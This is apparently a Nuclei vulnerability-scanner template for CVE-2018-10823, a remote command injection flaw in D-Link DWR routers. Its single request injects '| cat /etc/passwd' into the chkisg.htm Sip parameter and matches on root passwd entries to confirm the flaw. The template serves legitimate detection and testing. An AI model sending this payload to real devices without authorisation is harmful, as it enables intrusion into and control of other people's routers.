nuclei-templates/cves/2018/CVE-2018-10823.yaml

38 lines
1.2 KiB
YAML

id: CVE-2018-10823
info:
name: D-Link Routers - Remote Command Injection
author: wisnupramoedya
severity: high
description: |
D-Link DWR-116 through 1.06, DWR-512 through 2.02, DWR-712 through 2.02, DWR-912 through 2.02, DWR-921 through 2.02, and DWR-111 through 1.01 device may allow an authenticated attacker to execute arbitrary code by injecting the shell command into the chkisg.htm page Sip parameter. This allows for full control over the device internals.
reference:
- https://www.exploit-db.com/exploits/45676
- https://nvd.nist.gov/vuln/detail/CVE-2018-10823
- https://seclists.org/fulldisclosure/2018/Oct/36
- http://sploit.tech/2018/10/12/D-Link.html
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
cvss-score: 8.8
cve-id: CVE-2018-10823
cwe-id: CWE-78
tags: cve,cve2018,rce,iot,dlink,router
requests:
- method: GET
path:
- "{{BaseURL}}/chkisg.htm%3FSip%3D1.1.1.1%20%7C%20cat%20%2Fetc%2Fpasswd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0:"
- type: status
status:
- 200
# Enhanced by mp on 2022/06/19